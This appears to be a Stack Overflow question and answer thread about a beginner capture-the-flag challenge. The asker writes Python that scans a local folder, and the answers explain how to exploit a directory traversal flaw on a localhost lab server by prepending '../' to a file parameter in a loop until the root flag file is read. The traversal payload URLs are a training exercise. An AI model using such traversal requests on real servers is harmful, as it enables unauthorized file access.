0

How can you traverse directory to get to root in Python? I wrote some code using BeautifulSoup, but it says 'module not found'. So I have this:

#
# There is a directory traversal vulnerability in the
# following page http://127.0.0.1:8082/humantechconfig?file=human.conf
# Write a script which will attempt various levels of directory
# traversal to find the right amount that will give access
# to the root directory. Inside will be a human.conf with the flag.
#
# Note: The script can timeout if this occurs try narrowing
# down your search


import urllib.request
import os

req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf")
dirName = "/tmp"
def getListOfFiles(dirName):

    listOfFile = os.listdir(dirName)
    allFiles = list()

    for entry in listOfFile:
        # Create full path
        fullPath = os.path.join(dirName, entry)

        if os.path.isdir(fullPath):
            allFiles = allFiles + getListOfFiles(fullPath)
        else:
            allFiles.append(fullPath)

    return allFiles
listOfFiles = getListOfFiles(dirName)
print(listOfFiles)

for file in listOfFiles:
 if file.endswith(".conf"):
 f = open(file, "r")
 print(f.read())

This outputs:

/tmp/level-0/level-1/level-2/human.conf

User : Human 66

Flag: Not-Set (Must be Root Human)

However. If I change the URL to 'http://127.0.0.1:8082/humantechconfig?file=../../../human.conf' it gives me the output:

User : Human 66

Flag: Not-Set (Must be Root Human)




User : Root Human

Flag: Well done the flag is: {}

The level of directory traversal it is at fluctuates wildly, from /tmp/level-2 to /tmp/level-15; if it's at the one I wrote, then it says I'm 'Root Human'. But it won't give me the flag, despite the fact that I am suddenly 'Root Human'. Is there something wrong with the way I am traversing directory?

It doesn't seem to matter at all if I take away the req = urllib.request.urlopen("http://127.0.0.1:8082/humantechconfig?file=human.conf") line. How can I actually send the code to that URL? Thanks!

Ollie
  • 279
  • 5
  • 15

1 Answers1

0

cyber discovery moon base challenge? For this one, you need to keep adding '../' in front of human.conf (for example 'http://127.0.0.1:8082/humantechconfig?file=../human.conf') which becomes your URL. This URL you need to request (using urllib.request.urlopen(URL)). The main bit of the challenge is to attach the ../ multiple times which shall not be very hard using a simple loop. You don't need to use the OS. Make sure to break the loop once you find the flag (or it will go into an infinite loop and give you errors).

Aman Srii
  • 862
  • 10
  • 21
ANdroid
  • 24
  • 1
  • You don't really need to encode it just add (concatenate - hint) the ../ to the url – ANdroid May 28 '20 at 17:33
  • I would like to leave some for you to work out... Also the way I used wasn't really the ideal way. I just did for x in range(some varying integers from 100 to 1000 here until I got the flag): – ANdroid May 28 '20 at 17:35
  • I said to remove all the code relating to the OS module... you just need to req = urllib.request.urlopen(http://127.0.0.1:8082/humantechconfig?file=../../../../../../[or as many times as it takes to get to the root directory]human.conf then req = req.read() then print(req) there is some fault in the way you are using urllib too. Try looking for a tutorial on urllib. The moon base level 3 challenge 3 helps too. – ANdroid May 28 '20 at 18:09
  • all you are doing at the moment is going back directories in the remote system that the python file is saved in. You need to go back directories in the server of the url. (in this case the remote system is the server of the url hence the similarity in 'The flag is: {}' but this is just a theory - I'm not sure...). – ANdroid May 28 '20 at 18:17
  • Got it!! Thanks very much! – Ollie May 28 '20 at 19:38